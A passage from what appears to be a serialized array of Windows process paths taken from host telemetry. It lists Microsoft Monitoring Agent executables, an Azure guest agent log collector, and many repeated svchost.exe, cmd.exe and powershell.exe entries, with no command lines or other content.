2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\